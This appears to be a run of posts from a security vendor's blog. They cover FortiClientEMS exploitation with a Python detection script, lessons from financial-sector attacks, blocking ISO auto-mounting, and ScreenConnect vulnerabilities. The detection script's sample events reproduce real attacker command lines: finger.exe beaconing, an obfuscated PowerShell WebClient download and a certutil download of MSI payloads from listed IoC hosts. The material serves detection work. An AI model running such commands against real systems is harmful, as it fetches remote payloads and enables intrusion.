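    The post-exploitation pattern above (xp_cmdshell spawning cmd.exe under the SQL Server process, then finger.exe, PowerShell and certutil fetching payloads) turned into detection logic, as an added example that is not Blumira's own rule code: each rule is keyed to the three command lines reported in the update, and the network indicators from that update (kept defanged) are matched so a hit also reports which known IoC it touched. The process events are constructed; the "PowerShell WebClient Download" rule name is ours, and the parent-image check accepts both the page's sqlserver.exe spelling and the usual sqlservr.exe service binary name.

```python
import re
from dataclasses import dataclass
from typing import List

# Network indicators from the update above (published defanged), refanged here so
# they can be matched against raw command lines.
KNOWN_IOCS = {"185.56.83.82", "95.179.241.10", "ursketz.com"}

# The page names the parent as sqlserver.exe; the SQL Server service binary is
# commonly sqlservr.exe, so both spellings are accepted.
SQL_SERVER_IMAGES = {"sqlserver.exe", "sqlservr.exe"}

# IPv4 address or DNS name, optionally preceded by a URL scheme.
_HOST = re.compile(r"(?:https?://)?((?:\d{1,3}\.){3}\d{1,3}|(?:[a-z0-9-]+\.)+[a-z]{2,})", re.I)
# PowerShell method name assembled from short quoted fragments, e.g. 'D' + 'Own' + ...
_FRAGMENT_CONCAT = re.compile(r"'[^']{1,5}'\s*\+\s*'")


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


@dataclass
class Finding:
    rule: str
    iocs: List[str]   # known indicators present in the command line
    notes: List[str]  # extra context for the analyst


def refang(text: str) -> str:
    return text.replace("[.]", ".").replace("hxxp", "http")


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze(ev: ProcessEvent) -> List[Finding]:
    """Apply the rules to one process-creation event and return every rule that fires."""
    cmd = refang(ev.command_line)
    low = cmd.lower()
    iocs = sorted({h.lower() for h in _HOST.findall(cmd) if h.lower() in KNOWN_IOCS})
    image, parent = _basename(ev.image), _basename(ev.parent_image)
    findings: List[Finding] = []

    # xp_cmdshell runs its command through cmd.exe as a child of the SQL Server process.
    if parent in SQL_SERVER_IMAGES:
        findings.append(Finding("MSSQL XP_CMDSHELL Usage", iocs, [f"child of {parent}"]))

    # finger.exe used as a beacon/downloader: "finger user@host".
    if image == "finger.exe" or re.search(r"\bfinger(?:\.exe)?\s+\S+@\S+", low):
        findings.append(Finding("Suspicious Invocation of Finger.exe", iocs, []))

    # certutil fetching a remote file through its URL cache.
    if "certutil" in low and re.search(r"-urlcache|-split", low) and "://" in low:
        findings.append(Finding("Certutil Download", iocs, []))

    # PowerShell pulling a payload with WebClient / Invoke-Expression (rule name is ours).
    if "powershell" in low and re.search(r"net\.webclient|downloadfile|invoke-expression|\biex\b", low):
        notes = ["fragment-concatenated method name"] if _FRAGMENT_CONCAT.search(cmd) else []
        findings.append(Finding("PowerShell WebClient Download (example rule)", iocs, notes))
    return findings


CMD = "C:\\Windows\\system32\\cmd.exe"
SQL = "C:\\constructed\\sqlserver.exe"  # constructed parent path

# Constructed events: the three command lines reported in the update (kept defanged),
# all spawned from the SQL Server process, plus a benign certutil use that must not fire.
SAMPLE_EVENTS = [
    ProcessEvent(SQL, CMD, '"C:\\Windows\\system32\\cmd.exe" /c FINGER ADMIN@185.56.83[.]82'),
    ProcessEvent(SQL, CMD, "\"C:\\Windows\\system32\\cmd.exe\" /c powershell -nop -c $ds = 'D' + 'Own' + 'LOa'' + 'DfI' + 'le'; "
                           "Invoke-Expression (New-Object Net.WebClient).$ds.Invoke('http://95.179.241[.]10:23963/Bin/"
                           "ConnectWiseControl.ClientSetup.msi?e=Access&y=Guest', 'c:\\windows\\temp\\m.msi')"),
    ProcessEvent(SQL, "C:\\Windows\\system32\\certutil.exe",
                 "certutil -f -urlcache https://ursketz[.]com/bin/bander.msi c:\\windows\\temp\\x.msi"),
    ProcessEvent("C:\\Windows\\explorer.exe", "C:\\Windows\\system32\\certutil.exe",
                 "certutil -verify C:\\temp\\cert.cer"),
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        for f in analyze(ev):
            print(f"{f.rule}: iocs={f.iocs} notes={f.notes} :: {ev.command_line[:60]}")
```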

    Fortinet confirmed that exploitation of this vulnerability had been observed in the wild as of March 21, 2024. This is particularly concerning given the history of Fortinet devices being targeted by various threat actors, including advanced persistent threat (APT) groups and ransomware operators. These actors have exploited vulnerabilities in Fortinet devices in the past, emphasizing the importance of promptly addressing known vulnerabilities.

    What Should I Do?

    1. Immediately patch these affected FortiClientEMS versions:

    • 7.2.0 through 7.2.2
    • 7.0.1 through 7.0.10

    2. If your Blumira account supports logging with Blumira Agent or Sysmon, ensure that you are sending logs from your FortiClientEMS SQL server and that the “MSSQL XP_CMDSHELL Usage” detection rule is enabled (Settings > Detection Rules).

    No Action Needed

    If you have the following updated versions, no action is needed:

    • 7.2.3 or above
    • 7.0.11 or above

    How Blumira Can Help

    Blumira continues to actively monitor this issue and to look for ways that we can detect any stage of exploitation of this vulnerability. If you use FortiClientEMS but are not yet sending its logs to Blumira, we highly recommend doing so.

    Please see below for a full list of global reports specific to Fortigate:

    CIS Controls - Firewall Configuration Change (Fortigate)
    CIS Controls - IDS/IPS Alerts (Fortigate)
    CIS Controls - VPN Connections (Fortigate)
    CMMC - Firewall Configuration Change (Fortigate)
    CMMC - IDS/IPS Alerts (Fortigate)
    CMMC - VPN Connections (Fortigate)
    FERPA - Firewall Configuration Change (Fortigate)
    FERPA - IDS/IPS Alerts (Fortigate)
    FERPA - VPN Connections (Fortigate)
    FINRA - Firewall Configuration Change (Fortigate)
    FINRA - IDS/IPS Alerts (Fortigate)
    FINRA - VPN Connections (Fortigate)
    Fortigate: Failed Admin Management Login from External IP
    Fortigate: Successful Admin Management Login from External IP
    Fortigate: System Configuration Changes
    Fortigate: VPN - Successful Logins
    GLBA - Firewall Configuration Change (Fortigate)
    GLBA - IDS/IPS Alerts (Fortigate)
    GLBA - VPN Connections (Fortigate)
    HIPAA/HITECH - Firewall Configuration Change (Fortigate)
    HIPAA/HITECH - IDS/IPS Alerts (Fortigate)
    HIPAA/HITECH - VPN Connections (Fortigate)
    ISO 27001 - Firewall Configuration Change (Fortigate)
    ISO 27001 - VPN Connections (Fortigate)
    ISO 27002 - Firewall Configuration Change (Fortigate)
    ISO 27002 - IDS/IPS Alerts (Fortigate)
    ISO 27002 - VPN Connections (Fortigate)
    NIST - Fortigate Configuration Changes
    NIST - VPN Connection (Fortigate)
    PCI - Firewall Configuration Change (Fortigate)
    PCI - IDS/IPS Alerts (Fortigate)
    PCI - VPN Connections (Fortigate)
    SOC2 - Firewall Configuration Change (Fortigate)
    SOC2 - IDS/IPS Alerts (Fortigate)
    SOC2 - VPN Connections (Fortigate)



    Low
    March 20, 2024

    Lessons Learned from 3 Cyberattacks in Financial Services

    Financial Services

    While digital transformation efforts in the financial services industry create unmatched convenience for customers and fantastic growth opportunities for businesses, they also bring new cybersecurity risks.

    Unfortunately, as the third-most targeted industry* for cyberattacks, the financial services sector has numerous real-life examples that demonstrate the potential risks and consequences of such attacks. But as we mentioned in our post, 4 Cyberattacks on State/Local Government and What We Can Learn from Them, we don’t have to take these tales from a place of fear or panic. Instead, we can look at each of these stories to understand how to make our own businesses safer and strengthen our cybersecurity initiatives.

    While stories of cyberattacks at other financial institutions might be frustrating, organizations can learn a lot from each of these situations and take them to make positive changes within their businesses. In this post, we’ll cover three stories of recent cyberattacks to start digging deeper into cybersecurity best practices and uncover valuable insights.

    Danish Bank and Bankdata impacted by DoS attack

    In January 2023, a denial-of-service (DoS) attack disrupted access to Denmark’s central bank and seven of the country’s private banks. The attackers targeted the central bank, along with Bankdata, a company that developed IT solutions for several other Danish banks.

    Because of the attack, operations were shut down for several hours, including access to two of Denmark’s largest private banks. Although the organizations got operations back online later that same day, it still signaled to their customers and stakeholders that they were vulnerable to this type of attack in the first place and more than likely interrupted critical operations for users throughout the first half of the day.

    Security Magazine explains why DoS attacks like this one are so detrimental to financial institutions: “The financial services industry, in particular, has become a prominent target for distributed denial of service (DDoS) threat actors, as these organizations hold a larger market share, and their users rely heavily on 24/7 access to the critical services they provide. As institutions shift their services online and become more digitally accessible through services like mobile banking, the DDoS attack surface expands, leaving them increasingly vulnerable to a potential attack.”

    Lesson learned: Financial institutions should implement measures for identifying and isolating suspicious activity in real time.

    A real-time threat detection and response solution is a great place to start defending against DoS attacks. There are early signs of an incoming DoS attack, such as:

    • Lateral movement inside a system, in which an attacker is attempting to gain control of an internal system and then use it to trigger the attack
    • An IP address making an abnormally large number of requests
    • Lost connectivity across several devices in the same network

    By identifying these signs as early as possible and taking remediation action, such as isolating affected endpoints or blocking malicious traffic, your business can minimize the effects of a DoS attack and ensure the availability of critical services for customers.

    Ransomware attack against Fidelity National Financial

    In November 2023, a malicious gang infiltrated Fidelity National Financial, a major player in real estate services, using a ransomware attack. The gang successfully stole sensitive data from Fidelity’s customers. The attack also forced operations to shut down for an entire week, including the company’s website and email services, potentially affecting 1.3 million users. This shutdown meant customers couldn’t pay mortgages or check in on other financial-related information, such as receiving payments for real estate sales, for this period of time.

    Lesson learned: Financial institutions should take strategic actions to defend themselves against ransomware attacks, such as understanding their existing assets and proactively monitoring for early signs of attacks.

    There are a few powerful steps that financial institutions can take to protect themselves from ransomware attacks, such as:

    • Deactivating public IP access to Remote Desktop Protocol (RDP) and Windows Server Message Block (SMB)
    • Using a port scanner to see if an attacker is performing reconnaissance on your system and looking for weak entry points
    • Flagging and responding to early signs of ransomware. A few telltale signs include new software like network scanners or active directory access tools, the removal of security software, or unusual use of existing executables and binaries (e.g., unauthorized Powershell script execution)
    • Planning ahead for potential ransomware attacks by creating a robust incident response plan and keeping online and offline backups of critical data

    Martin Lewis and AI Social Engineering

    While this story doesn’t focus on a particular financial institution, it still tells a cautionary tale to the FinServ industry. In the summer of 2023, English financial journalist and broadcaster Martin Lewis allegedly posted a video of himself discussing an Elon Musk project and telling British citizens it was a “great investment opportunity.”

    It turned out that this video was an AI deepfake and wasn’t actually created by Lewis in the first place. According to Lewis, “This is frightening; it’s the first deep fake video scam I’ve seen with me in it. Government and regulators must step up to stop big tech from publishing such dangerous fakes. People will lose money, and it will ruin lives.”

    The Financial Conduct Authority (FCA) released a warning to financial firms shortly after this incident, highlighting that cyberattacks and identity fraud will grow in scale and risk level because of AI.

    Lesson learned: Now, more than ever, it’s vital for financial institutions to train staff and customers about recognizing social engineering risks, including emerging tactics such as AI deepfakes.

    While many organizations already have training programs for spotting typical social engineering schemes, implementing training for spotting more subtle AI-driven threats is also important.

    Forbes provides advice for training users to spot deepfakes, saying, “When it comes to [AI] phishing prevention and detection, nothing is more powerful than human intuition. Training employees to recognize and report fake online identities, visual anomalies such as lip sync inconsistencies, jerky head and torso movements, unusual audio cues, and irregular or suspicious requests is paramount. Organizations that do not have this training expertise can also consider phishing simulation programs that use real, in-the-wild example social engineering scripts.”

    Of course, these emerging threats also make it more important than ever to turn to foundational cybersecurity practices, such as leveraging multi-factor authentication (MFA) and encouraging the use of single sign-on (SSO) for staff.

    The power of effective threat detection and response

    As we saw throughout these stories, effective detection and response can make all the difference when dealing with cyber threats. Blumira offers a threat detection and response platform with cloud SIEM, endpoint visibility, and automated response to suspicious activities. We simplify security for lean financial IT teams with one easy-to-use solution, saving time and staff hours.

    Check out Today’s Top Cybersecurity Challenges for Credit Unions — And How To Overcome Them to learn more cybersecurity tactics for small to medium-sized teams at financial institutions.

    *https://www.cfo.com/news/financial-industry-is-third-most-targeted-by-hackers/654808/

    Low
    March 18, 2024

    Defend Against Automated Disk Image Attacks

    Microsoft Security

    Welcome back to the Hedgehog Defense! In this post, we’re going to take a look at a common technique abused by threat actors to sneak past your typical mail filter and Windows defenses - automatic disk image mounting. Unintentionally, this is one of those, “Defenders hate this one easy trick!!!” deals. Fortunately, there are a couple of quick and easy changes you can make to help defend yourself against this technique. I’ll be detailing how this feature is abused, why it works, and what you can do about it.

    What is Automatic Disk Image Mounting?

    Almost everyone knows of the .iso file - these are basically disk images without the physical disk part. Administrators will typically write these to bootable media such as physical discs or USB drives. However, disk images can also be mounted directly in Windows Explorer, allowing you to access their contents without having to write them to media. Native image mounting in Explorer was introduced with Windows 8 and has made it into every version since. This feature enables Windows to mount disk images such as ISO, IMG, VHD, and VHDX files in Explorer by default. You could do the same in versions before Windows 8, but third-party applications were required. If there is one thing that attracts threat actors, it’s new features that were previously only possible through third-party apps. A new built-in feature like this guarantees that people running Windows are now equipped with the tools by default and will be targeted.

    How is it abused by threat actors “in the wild”?

    So what’s the big deal? How could mounting a disk image possibly be leveraged by threat actors? The biggest advantages lie in the file type itself and not in its functionality. There are two primary reasons image files have been abused by threat actors:

    1. Image files have had an issue in the past with properly assigning “Mark of the Web” identifiers (more info in the next section)
    2. Not all mail filters will block image files by default or they may even be configured to allow them

    Image file formats are unusual and uncommon vehicles for malware distribution. We all know how heavily scrutinized zip files are when it comes to emailing them to other people, or imagine trying to send an executable attachment. No matter who you send those to or how they have their mail filter configured, it’s unlikely those files will make it to the intended recipient. Most mail filters will outright deny the email or strip the attachment. Furthermore, if those files do make it past the filter, they’ll probably be wiped out by an antivirus. Image files are not impervious to these defense tactics either, but due to their uncommon nature, some mail filters might not block them by default, and more people may be willing to allow them since they don’t realize the danger. Users may be trained to be on the lookout for the common malware file types, and seeing an image file may lower their guard a little bit. It’s certainly not foolproof, but attackers will take any advantage they can get. Image files have also been observed being served via malicious advertising links.

    Mark of the Web

    Image files, like .ISO for example, previously had the ability to bypass a Windows security feature called “Mark of the Web” (MotW). This feature essentially marks files sourced from the internet with a special identifier. This identifier is used by Windows to handle files in a particular way. For example, if an Excel spreadsheet is downloaded from the internet, it will have the MotW identifier branded on it, essentially telling anyone who will listen that it originated from the internet. When a user tries to open this Excel file, Windows examines the MotW tag, acknowledges that it originated from the internet, and, as a result, processes the file through SmartScreen and opens the file in “protected view”. “Protected view” essentially puts the Excel file in a read-only mode where macros are disabled and no modifications can be made. When MotW is bypassed, Windows treats the file like a locally created file and does not handle the file in any special way. Threat actors like this because if they can get Windows to place some implicit trust in the file they’ve sent you, they can fly under the radar a little bit longer and get things to execute when they shouldn’t be able to.

    Screenshot: Examining a local file, no Zone.Identifier data stream

    Screenshot: Examining the Zone.Identifier stream on a file downloaded from the internet

    Microsoft supposedly patched this particular MotW bypass strategy on November 8, 2022 (assigned CVE-2022-41091). While a fully patched version of Windows 10 does indeed mark the iso file as originating from the internet, I am unable to get the same report for the contents of the iso file once mounted. I’m not convinced this means these files aren’t tagged with the MotW zone.identifier, but just thought it was worth noting. Another reason to continue reading and take things a step further in terms of prevention.

    Screenshot: Examining data streams of a file contained within the mounted ISO

    Defense Against the Dark Arts (Image Mounting)

    If we remember anything about the Hedgehog Defense tactic, it was that we should be focusing on a “defense in depth” strategy and layering our defenses whenever possible. In the case of attacks based on image files, we have several things going for us already - mail filters, antivirus, user training, and Microsoft patches, but why not just prevent users from being able to mount image files altogether? Sure, there may be a handful of users who need it as a legitimate business need, but I would bet that most users could be blocked and would be none the wiser while working through their day to day tasks. It’s following the practice of least privilege - if they don’t need to mount images, don’t let them. Let’s take a look at how we would go about doing that.

    There are two primary ways to mount a disk image in Windows - double-clicking the file, and the right-click context menu “Mount” option. I will be going over a couple of ways that block both; however, there are some methods that block just one or the other. One of those may be better for your situation/environment, but be aware of what you are enabling and make sure it provides the kind of coverage you want.

    Method 1 (recommended): Disable all the things (via GPO)!

    The first method I’m going to detail is the “all-in-one” and the one that I would recommend. It disables right-click mounting, double-click mounting, and mounting via PowerShell. You can also configure this method to be overridden by administrators if desired. These steps come directly from this write-up by Mubix "Rob" Fuller. This option won’t visibly remove the “Mount” option from the right-click context menu, but it effectively disables its functionality.

    Video: https://www.blumira.com/wp-content/uploads/2024/03/no_mount.mp4

    Eventually the mount attempt results in an error message.

    Auditing Existing Usage

    If you don’t want to fully implement the “scream test” and would like to first audit your environment’s existing usage of Windows disk image mounting, create and deploy a GPO to audit plug and play events. This GPO option can be found under Computer Configuration > Windows Settings > Security Settings > Advanced Audit Policy Configuration > Audit Policies > Detailed Tracking > Audit PNP Activity.

    Configuring and deploying this GPO will enable generation of Windows Event ID 6422. Of these events, you would specifically be looking for events related to SCSI\CdRomMsft____Virtual_DVD-ROM_ which would indicate the mounting of a disk image. Once you have that data, you can start getting a clear picture of who is using this feature on a regular basis and consider exempting them if there is a valid business need.
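One way to pull that usage picture out of the Security log once the audit policy is in place, as an added example that is not part of the original post: it filters Event ID 6422 for the virtual DVD-ROM device ID named above and groups the hits by computer and user. The SubjectUserName and DeviceId field names are assumptions about the event schema; the device ID match itself is done on the rendered message, so the summary still works if those field names differ.

```powershell
# Added example (not from the original post): summarize disk image mounts from
# Windows Security Event ID 6422 ("A device was enabled"), which "Audit PNP Activity"
# generates. Run in an elevated session; reading the Security log requires it.
$deviceIdPattern = [regex]::Escape('CdRomMsft____Virtual_DVD-ROM_')
$since = (Get-Date).AddDays(-30)

$events = Get-WinEvent -FilterHashtable @{
    LogName   = 'Security'
    Id        = 6422
    StartTime = $since
} -ErrorAction SilentlyContinue

$mounts = foreach ($e in $events) {
    # The rendered message always contains the device ID, so match on it first.
    if ($e.Message -notmatch $deviceIdPattern) { continue }

    # Pull structured fields from the event XML. SubjectUserName and DeviceId are
    # assumed field names for 6422; missing fields simply come back empty.
    $xml  = [xml]$e.ToXml()
    $data = @{}
    foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }

    [pscustomobject]@{
        TimeCreated = $e.TimeCreated
        Computer    = $xml.Event.System.Computer
        User        = $data['SubjectUserName']
        DeviceId    = $data['DeviceId']
    }
}

# Who mounts images regularly? These are the candidates for a GPO exemption.
$mounts |
    Group-Object Computer, User |
    Sort-Object Count -Descending |
    Select-Object Count, Name |
    Format-Table -AutoSize
```

Run it on the collection point after the events have been forwarded, or on individual workstations while the audit GPO soaks; the per-user counts are what you compare against claimed business needs before deploying the blocking GPO.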

    Configuring the GPO

    To configure the GPO that is actually going to do all the blocking, follow these steps:

    • Make a new GPO and browse to Computer Configuration > Administrative Templates > System > Device Installation > Device Installation Restrictions > Prevent installation of devices that match any of these device IDs

    • Enable the GPO and check the box for “Also apply to matching devices that are already installed”.

    • Click on the “Show…” button and then add the device ID SCSI\CdRomMsft____Virtual_DVD-ROM_

    • Bonus - If you want Administrators to be able to override this setting, make sure you also enable the separate setting, “Allow administrators to override Device Installation Restriction policies”

    • That’s it! Now assign this GPO out to whatever OU you want or deploy domain wide if you want everyone locked down. Remember that this is a Computer Configuration based GPO, so it must be assigned to a Computer OU.

    Method 2: Change the default app for Image files (via GPO)

    This next method provides slightly less coverage, but that may be more ideal for some environments. For example, it still allows mounting via PowerShell, and, although it technically removes the right-click “Mount” context menu option, you can still choose “Open with Explorer” and the image will mount. It’s accomplished by changing the default app associated with image file extensions, in this case ISO, IMG, VHD, and VHDX. If this looks familiar, it’s because it’s the same technique I detailed in the last Hedgehog Defense. I won’t go into much detail since my previous blog post covers all of that, but you would essentially assign these file types (ISO, VHD, VHDX, and IMG) to open with something innocuous like Notepad (...with these file association strategies, maybe we should refer to it as “nopepad”?). It must also be noted that users can manually set the default app back to Explorer and bypass this method of prevention.

    Video: https://www.blumira.com/wp-content/uploads/2024/03/notepad_mount.mp4

    Method 3: Remove “Mount” Context Menu Item and Disable Double Click Mount via Registry

    The third and last method I will be discussing is accomplished with a simple registry edit. This method will completely remove the right click “mount” context menu option and disable double click mounting, but will still allow for mounting via PowerShell.

    1. Open registry editor and browse to HKEY_CLASSES_ROOT\Windows.IsoFile\shell\mount
    2. Right click and create a new REG_SZ (string) value named ProgrammaticAccessOnly
    3. To cover VHD and VHDX, add the same key to HKEY_CLASSES_ROOT\Windows.VhdFile\shell\mount
    4. That’s it, a reboot isn’t even needed

    Now, when you right click, the “Mount” option is missing and double clicking results in opening the file with the disk burner (which also disables the attack flow).
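For anyone pushing Method 3 out through an RMM, here is the same registry change scripted in PowerShell, as an added example that is not part of the original post. It assumes an elevated session and that the two file-class verb keys named above exist on the target (they are skipped with a warning if not).

```powershell
# Added example (not from the original post): apply Method 3 with PowerShell.
# Adding a ProgrammaticAccessOnly value to the "mount" verb hides that verb from the
# context menu and stops double-click mounting; PowerShell Mount-DiskImage still works.
$verbKeys = @(
    'HKCR:\Windows.IsoFile\shell\mount',   # ISO / IMG
    'HKCR:\Windows.VhdFile\shell\mount'    # VHD / VHDX
)

# PowerShell does not map HKEY_CLASSES_ROOT as a drive by default.
if (-not (Get-PSDrive -Name HKCR -ErrorAction SilentlyContinue)) {
    New-PSDrive -Name HKCR -PSProvider Registry -Root HKEY_CLASSES_ROOT | Out-Null
}

function Set-MountVerbHidden {
    param([string[]]$Keys)
    foreach ($key in $Keys) {
        if (-not (Test-Path -Path $key)) {
            Write-Warning "$key not found on this host; skipping"
            continue
        }
        # The value only needs to exist; the shell ignores its contents.
        New-ItemProperty -Path $key -Name 'ProgrammaticAccessOnly' `
            -PropertyType String -Value '' -Force | Out-Null
    }
}

function Test-MountVerbHidden {
    # Returns one row per key so a deployment job can report success per class.
    param([string[]]$Keys)
    foreach ($key in $Keys) {
        $present = $null -ne (Get-ItemProperty -Path $key -Name 'ProgrammaticAccessOnly' `
            -ErrorAction SilentlyContinue)
        [pscustomobject]@{ Key = $key; Hidden = $present }
    }
}

Set-MountVerbHidden -Keys $verbKeys
Test-MountVerbHidden -Keys $verbKeys | Format-Table -AutoSize
```

To roll the change back, remove the value with Remove-ItemProperty on the same keys; as the post notes, no reboot is needed in either direction.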

    Video: https://www.blumira.com/wp-content/uploads/2024/03/reg_no_mount.mp4

    Obviously, if you’re deploying this en masse, you’ll have to find a way to automate this process, but many RMMs have this ability. You can also deploy registry changes like this via GPO. That is out of scope of this article, but there are plenty of guides online that can help with automating and deploying registry changes.

    Proof of Concept

    Now let's take a look at these things in action in a simulated attack. In this example, our poor victim, Hank, received an email asking him to review a file on his company's file share. Unfortunately, the link sent to him is spoofed to look like it's local to his network, but it's really reaching out externally to download the iso. Upon downloading the iso, Hank clicks on it to open it (as most people would do) and it mounts the iso. From there, he double clicks the "Document" shortcut which runs the payload and establishes a connection with the attacker.

    Video: https://www.blumira.com/wp-content/uploads/2024/03/PoC_Before.mp4

    Now that we know what a successful attack looks like, let's see what happens if Method 1 was deployed.

    Video: https://www.blumira.com/wp-content/uploads/2024/03/PoC_after_edit.mp4

    In this situation, no matter how Hank tries to mount the iso file, it is unsuccessful. As a result, he is unable to access the contents and trigger the payload. No callback for the attacker this time!

    How Blumira Can Help!

    Now that you've learned how to stop this kind of attack - learn how to detect it! Blumira has a dedicated detection titled, "Potentially Malicious ISO file (LNK)" that will notify you should this kind of activity occur in your environment.

    Learn more about how Blumira supports your cybersecurity strategy by trying out our free Blumira SIEM.

    Medium
    February 20, 2024

    Critical ScreenConnect Vulnerabilities Allow Remote Code Execution

    Microsoft Security

    Update – 5:45pm 2.21.24 – Detections have been built and tested and are in the process of being deployed to all of our customers. There are three new detections overall and all three are enabled by default:

    • ConnectWise ScreenConnect Path Traversal Exploitation CVE-2024-1708
      • Identifies IOC artifacts in C:\Program Files (x86)\ScreenConnect\App_Extensions\
      • utilizes Windows EID 4663, Sysmon EID 11, or Blumira Agent
    • ConnectWise ScreenConnect SetupWizard User Database Modification CVE-2024-1709
      • Identifies IOC artifacts in C:\Windows\Temp\ScreenConnect
      • utilizes Windows EID 4663, Sysmon EID 11, or Blumira Agent
    • ConnectWise ScreenConnect SetupWizard Authentication Bypass CVE-2024-1709
      • Identifies web requests to SetupWizard.aspx with a trailing path
      • utilizes Windows IIS logs (via nxlog or Blumira Agent)

    There is nothing you need to do to enable these. These are rolling out to all of our customers now and will automatically begin watching for suspicious events.
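The IIS-side indicator from the third detection, requests whose path continues past SetupWizard.aspx, can be checked against your own W3C logs with the following added example; it is illustrative code, not Blumira's detection logic. The log lines are constructed samples (TEST-NET addresses), and the field order is read from the log's own #Fields header rather than assumed.

```powershell
# Added example (not Blumira's detection): flag IIS W3C log entries whose request
# path has anything after SetupWizard.aspx. A legitimate setup request hits
# /SetupWizard.aspx exactly; a trailing "/" or extra segment is the anomaly.
$sampleLog = @'
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2024-02-21 14:02:11 10.0.0.5 GET /SetupWizard.aspx - 443 - 203.0.113.10 Mozilla/5.0 200
2024-02-21 14:02:15 10.0.0.5 POST /SetupWizard.aspx/ - 443 - 203.0.113.10 Mozilla/5.0 200
2024-02-21 14:02:16 10.0.0.5 POST /setupwizard.aspx/anything - 443 - 203.0.113.10 python-requests/2.31 200
2024-02-21 14:03:01 10.0.0.5 GET /Script.ashx - 443 - 198.51.100.7 Mozilla/5.0 200
'@

function Find-SetupWizardTrailingPath {
    param([string[]]$Lines)
    $fields = $null
    foreach ($line in $Lines) {
        if ($line -like '#Fields:*') {
            # Column names are declared in the header and can differ per site/log format.
            $fields = $line.Substring(8).Trim() -split '\s+'
            continue
        }
        if ($line -like '#*' -or [string]::IsNullOrWhiteSpace($line)) { continue }
        if (-not $fields) { continue }   # no header yet; cannot map columns

        $values = $line -split '\s+'
        $row = @{}
        $n = [Math]::Min($fields.Count, $values.Count)
        for ($i = 0; $i -lt $n; $i++) { $row[$fields[$i]] = $values[$i] }

        # -match is case-insensitive in PowerShell; the "/" after .aspx is the key.
        if ($row['cs-uri-stem'] -match '/SetupWizard\.aspx/') {
            [pscustomobject]@{
                Time     = "$($row['date']) $($row['time'])"
                ClientIP = $row['c-ip']
                Method   = $row['cs-method']
                Path     = $row['cs-uri-stem']
                Status   = $row['sc-status']
            }
        }
    }
}

# Two of the four sample requests are flagged; the exact /SetupWizard.aspx hit is not.
Find-SetupWizardTrailingPath -Lines ($sampleLog -split "`r?`n") | Format-Table -AutoSize
```

Point it at a real log with `Find-SetupWizardTrailingPath -Lines (Get-Content 'C:\inetpub\logs\LogFiles\W3SVC1\u_ex240221.log')` (path is a placeholder for your site's log directory) and treat any hit from before the 23.9.8 upgrade as grounds for the user-database review described in the other two detections.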

     

    Update – 1:16pm 2.21.24 – Through further research and review, it seems Sysmon should be able to catch some of this activity as well. Both previously mentioned 4663 events should generate Sysmon Event 11 (file create) events. If you used Poshim to deploy Blumira or use our Blumira Agent, you are already covered. While not recommended, you can also manually deploy and configure Sysmon.

     

    Update – 12:12pm 2.21.24 – Huntress has released a really great article getting into the details of these vulnerabilities and what to look for when they are exploited. Blumira is working quickly to build, test, and deploy these detections to our customers. Based on Huntress’ research, the best indicators come from Windows Event ID 4663 and IIS web server logs. If you don’t have these configured for your ScreenConnect web server, refer to these articles to help you do so:

    ScreenConnect Temp directory SACL settings
    ScreenConnect ProgramFiles directory SACL settings

     

    Update – 4:51pm 2.20.24 – PoC (Proof of Concept) exploit development is showing results with several researchers demonstrating exploitation in test environments. Successful exploitation results in a new ScreenConnect admin account being created. Monitoring for newly created users and login activity for your ScreenConnect instance is a good first step. Again, due to the nature of this vulnerability, no previous authentication is required, with Horizon3 stating the vulnerability to be “extremely trivial” to exploit. Reference – Horizon3 and Huntress


    What Happened?

    On February 19th, 2024, the IT Management Software company, ConnectWise, announced the identification of two vulnerabilities in their remote access tool, ScreenConnect. These vulnerabilities directly impact and target on-prem or self-hosted ScreenConnect Web Servers running version 23.9.7 and prior.

    • CWE-288 Authentication bypass using an alternate path or channel
    • CWE-22 Improper limitation of a pathname to a restricted directory (“path traversal”)

    Due to the nature of these vulnerabilities, they have been assigned a critical severity by ConnectWise, defined as, “Vulnerabilities that could allow the ability to execute remote code or directly impact confidential data or critical systems.”

    In regards to remediation and patching priority, ConnectWise has assigned this as high priority, “Vulnerabilities that are either being targeted or have higher risk of being targeted by exploits in the wild. Recommend installing updates as emergency changes or as soon as possible (e.g., within days)”.

    These vulnerabilities were reported to ConnectWise on February 13th by an unnamed security researcher via the ConnectWise Trust Center. ConnectWise has stated that, “There is no evidence that these vulnerabilities have been exploited in the wild, but immediate action must be taken by on-premise partners to address these identified security risks.”

     

    How Bad is This?

    Vulnerabilities that lead to remote code execution are some of the most critical and severe issues out there and could lead to complete control over a targeted server. To make matters worse, ScreenConnect servers affected by these vulnerabilities are likely going to be public facing, making them easy targets for mass scans and exploitation.

     

    What Should I Do?

    Remediation

    Cloud – For organizations using a managed ScreenConnect Cloud instance, no remediation action is necessary. “ScreenConnect servers hosted in ‘screenconnect.com’ cloud or ‘hostedrmm.com’ have been updated to remediate the issue.”

    On-Premises/Self-hosted – Update ConnectWise ScreenConnect servers to version 23.9.8 immediately.

    Investigation/Detection

    Unfortunately, details are light at the moment and no indicators of attack have been publicly released. There has been no evidence of these vulnerabilities being exploited in the wild, but that is likely due to the age of this announcement and, as time goes on, will undoubtedly change as threat actors begin acquiring targets and weaponizing these vulnerabilities.

     

    How Blumira Can Help

    Blumira continues to actively monitor this issue, and look for ways that we can detect any stage of exploitation of these vulnerabilities. If Blumira gains the ability to detect the attacks using these vulnerabilities, it is most likely going to be via our endpoint agent. If you are running an on-prem ScreenConnect server, and you are already using a Blumira edition that supports endpoint agents, please ensure that you have the endpoint agent installed on your ScreenConnect server.

    If you are an MSP and not already using Blumira, please submit a request for a “free for internal use” NFR account.

    Blumira’s Free SIEM is easy to deploy; IT and security teams can start seeing immediate security value for their organizations.

    Low
    February 13, 2024

    4 Cyberattacks on State/Local Government and What We Can Learn from Them

    Local Government

    There’s something very compelling and fascinating about bad news. Maybe that’s why so many people consume media like true crime podcasts and TV drama series. This might also explain why so many of us find cyberattacks—especially ones that affect critical infrastructure and large-scale operations—so interesting. But as a leader at a state or local government level, these types of stories might go beyond fascination; they might also spark uneasiness and even a bit of fear.

